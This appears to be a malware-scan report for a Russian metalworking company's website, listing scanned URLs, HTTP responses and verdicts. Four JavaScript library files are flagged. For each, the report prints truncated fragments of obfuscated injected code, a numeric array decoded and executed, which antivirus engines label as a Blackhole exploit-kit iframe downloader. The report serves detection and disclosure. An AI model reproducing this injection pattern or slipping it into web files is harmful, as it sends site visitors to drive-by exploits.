| Request | Server response | Status |
http://eco-tn.ru/ | 200 OK
Content-Length: 8168
Content-Type: text/html | clean |
http://eco-tn.ru/media/system/js/caption.js | 200 OK
Content-Length: 5040
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 3503 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-681!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- Tencent
- Unk.Win32.Script.400114
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/prototype.js | 200 OK
Content-Length: 166422
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype = {
Version: '1.7',
Browser: (function(){
var ua = navigator.userAgent;
var isOpera = Object.prototype.toString.call(window.opera) == '[object Opera]';
return {
IE: !!window.attachEvent && !isOpera,
Opera: isOpera,
WebKit: ua.indexOf('AppleWebKit/') > -1,
Gecko: ua.indexOf('Gecko') > -1 && ua.indexOf('KHTML') === -1,
MobileSafari: /Appl
... 3269 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- AVG
- Script/Exploit.Kit
- Norman
- Agent.ACZSM
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/scriptaculous.js?load=effects,builder | 200 OK
Content-Length: 6034
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = {
Version: '1.9.0',
require: function(libraryName) {
try{
document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>');
} catch(e) {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = libraryName;
document.getElementsByTagName('head')[0].appendChild(script);
}
},
REQUIRED_PROTOTYPE: '1.6.0.3',<
... 3762 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- Trojan-Downloader.JS.Agent.gqu
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-474
- F-Secure
- Trojan.JS.Iframe.BJT
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- ESET-NOD32
- JS/Agent.NFO
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/templates/eco-tn/js/lightbox.js | 200 OK
Content-Length: 21640
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) LightboxOptions = Object.extend({
fileLoadingImage: '/tpl/images/lb-loading.gif',
fileBottomNavCloseImage: '/tpl/images/lb-closelabel.gif',
overlayOpacity: 0.8,
animate: true, resizeSpeed: 7,
borderSize: 10,
labelImage: "ÐзобÑажение",
labelOf: "из"
}, window.LightboxOptions || {});
var Lightbox = Class.create();
Lightbox.prototype = {
imageArray: [],
activeImag
... 3149 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);}Antivirus reports:- AntiVir
- JS/Agent.CO.1
- Avast
- JS:Crypt-A [Trj]
- Ad-Aware
- Trojan.JS.Iframe.BJT
- Ikarus
- Trojan.Script
- Rising
- JS:Hack.Exploit.Script.JS.IframeRef.a!1610720
- nProtect
- Trojan.JS.Iframe.BJT
- K7AntiVirus
- Exploit ( 04c555e71 )
- Comodo
- TrojWare.JS.Blacole.F
- Emsisoft
- Trojan.JS.Iframe.BJT (B)
- CAT-QuickHeal
- JS/BlacoleRef.BA
- K7GW
- Exploit ( 04c555e71 )
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.233
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:HTML/IframeRef.BG
- Kaspersky
- HEUR:Trojan.Script.Generic
- MicroWorld-eScan
- Trojan.JS.Iframe.BJT
- Tencent
- Unk.Win32.Script.400114
- Fortinet
- JS/Crypt.CAAD!tr
- TotalDefense
- JS/BlacoleRef.N
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blacole.tftlj
- ClamAV
- Trojan.Blackhole-483
- F-Secure
- Trojan.JS.Iframe.BJT
- VIPRE
- Trojan-Downloader.JS.Agent.gup (v)
- F-Prot
- JS/Blacole.BF
- AVG
- Script/Exploit.Kit
- Norman
- Downloader.HIVI
- Sophos
- Mal/ScrLd-A
- GData
- Trojan.JS.Iframe.BJT
- Symantec
- Trojan.Malscript!html
- Commtouch
- JS/Blacole.BF
- BitDefender
- Trojan.JS.Iframe.BJT
|
http://eco-tn.ru/about.html | 200 OK
Content-Length: 4218
Content-Type: text/html | clean |
http://eco-tn.ru/production.html | 200 OK
Content-Length: 6995
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi.html | 200 OK
Content-Length: 5883
Content-Type: text/html | clean |
http://eco-tn.ru/contacts.html | 200 OK
Content-Length: 7154
Content-Type: text/html | clean |
http://eco-tn.ru/test404page.js | 404 Not Found
Content-Length: 212
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/constructorskie-razrabotki.html | 200 OK
Content-Length: 6762
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/lazernaya-rezka.html | 200 OK
Content-Length: 7555
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/gibka-metalla.html | 200 OK
Content-Length: 8937
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/svarochnye-raboty.html | 200 OK
Content-Length: 14663
Content-Type: text/html | clean |
http://eco-tn.ru/uslugi/phosphatirovanie.html | 200 OK
Content-Length: 12010
Content-Type: text/html | clean |
